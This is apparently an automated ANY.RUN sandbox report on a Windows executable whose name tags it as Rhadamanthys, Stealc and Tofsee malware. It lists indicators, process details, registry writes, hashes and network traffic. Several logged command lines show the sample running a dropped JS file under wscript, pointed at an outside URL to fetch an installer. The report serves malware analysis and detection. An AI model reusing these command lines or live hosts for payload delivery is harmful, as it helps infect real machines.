File name: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee

Full analysis: https://app.any.run/tasks/902bfb2a-4702-46be-872f-22da51e0755d
Verdict: Malicious activity
Analysis date: June 16, 2025, 12:51:40
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: 006A97496368C86C7451FBEEEFE58E29
SHA1: 44EB15DE11DB43A3F10262314AFFF2F780F5B096
SHA256: EC2A58E6A761E01EA7EE9B6A7C1657426E04DA64FC1BDB8036C613C8C6822EB4
SSDEEP: 3072:/kGn8cgEde45laEReU7ZtEnvTjx/TQMNJ9ztRqILacKdjh70OEFI6DIEXZW+5T7T:/3gwx55tEnvXhTQQJ5qzcKdjh7ULp7gU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 1712)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • Accesses command line arguments (SCRIPT)

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)
    • The process executes JS scripts

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • The process downloads a VBScript from the remote host

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
  • INFO

    • Create files in a temporary directory

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • Reads the computer name

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • Process checks computer location settings

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • Checks supported languages

      • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (PID: 6360)
    • Checks proxy server information

      • wscript.exe (PID: 1564)
      • wscript.exe (PID: 632)
      • wscript.exe (PID: 6344)
      • wscript.exe (PID: 3640)
      • wscript.exe (PID: 1712)
      • slui.exe (PID: 5496)
    • Reads the software policy settings

      • slui.exe (PID: 5496)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2015:08:03 09:35:07+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 10
CodeSize: 113152
InitializedDataSize: 75776
UninitializedDataSize: -
EntryPoint: 0xe29c
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 142
Monitored processes: 8
Malicious processes: 6
Suspicious processes: 0

Behavior graph

Graph nodes:
  • start
  • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
  • wscript.exe (no specs)
  • wscript.exe (no specs)
  • wscript.exe (no specs)
  • wscript.exe (no specs)
  • wscript.exe (no specs)
  • slui.exe
  • 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID: 632
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exe
Path: C:\Windows\SysWOW64\wscript.exe
Parent process: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 1
Version: 5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1564
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exe
Path: C:\Windows\SysWOW64\wscript.exe
Parent process: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 1
Version: 5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1712
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exe
Path: C:\Windows\SysWOW64\wscript.exe
Parent process: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 1
Version: 5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 3640
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exe
Path: C:\Windows\SysWOW64\wscript.exe
Parent process: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 1
Version: 5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 5020
CMD: "C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe"
Path: C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540
Modules
Images
c:\users\admin\desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID: 5496
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 6344
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\fuf69B6.js" http://www.djapp.info/?domain=PZAMQPWwgz.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\admin\AppData\Local\Temp\fuf69B6.exe
Path: C:\Windows\SysWOW64\wscript.exe
Parent process: 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft ® Windows Based Script Host
Exit code: 1
Version: 5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 6360
CMD: "C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe"
Path: C:\Users\admin\Desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
Parent process: explorer.exe
User: admin
Integrity Level: HIGH
Exit code: 0
Modules
Images
c:\users\admin\desktop\2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events: 7 929
Read events: 7 908
Write events: 21
Delete events: 0

Modification events

(PID) Process: (1564) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (1564) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (1564) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6360) 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation: write
Name: JSFile
Value:

(PID) Process: (1564) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation: write
Name: JScriptSetScriptStateStarted
Value: 797B170000000000

(PID) Process: (632) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (632) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (632) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (6344) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (6344) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:
Executable files: 0
Suspicious files: 0
Text files: 1
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6360 | 2025-06-16_006a97496368c86c7451fbeeefe58e29_elex_mafia_rhadamanthys_stealc_tofsee.exe | C:\Users\admin\AppData\Local\Temp\fuf69B6.js | text
MD5: 3813CAB188D1DE6F92F8B82C2059991B
SHA256: A3C5BAEF033D6A5AB2BABDDCFC70FFFE5CFBCEF04F9A57F60DDF21A2EA0A876E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 27
TCP/UDP connections: 42
DNS requests: 27
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1268 | svchost.exe | GET | 200 | 184.24.77.35:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
1508 | RUXIMICS.exe | GET | 200 | 184.24.77.35:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
5944 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
1508 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
5944 | MoUsoCoreWorker.exe | GET | 200 | 184.24.77.35:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
- | - | GET | 304 | 52.149.20.212:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | - | - | -
- | - | POST | 200 | 20.190.160.22:443 | https://login.live.com/RST2.srf | unknown | xml | 11.1 Kb | whitelisted
- | - | GET | 200 | 52.149.20.212:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | - | - | -
- | - | POST | 200 | 40.126.32.76:443 | https://login.live.com/RST2.srf | unknown | xml | 10.3 Kb | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1268 | svchost.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
1508 | RUXIMICS.exe | 40.127.240.158:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1268 | svchost.exe | 184.24.77.35:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5944 | MoUsoCoreWorker.exe | 184.24.77.35:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1508 | RUXIMICS.exe | 184.24.77.35:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
5944 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.181.238
whitelisted
www.djapp.info
unknown
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.37
  • 2.16.241.19
  • 2.16.241.12
whitelisted
bi.downthat.com
unknown
www.microsoft.com
  • 95.101.149.131
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
whitelisted
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.32.76
  • 40.126.32.138
  • 20.190.160.22
  • 20.190.160.131
  • 40.126.32.68
  • 20.190.160.20
  • 20.190.160.66
  • 40.126.32.74
whitelisted
nexusrules.officeapps.live.com
  • 52.111.229.43
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted

Threats

No threats detected
No debug info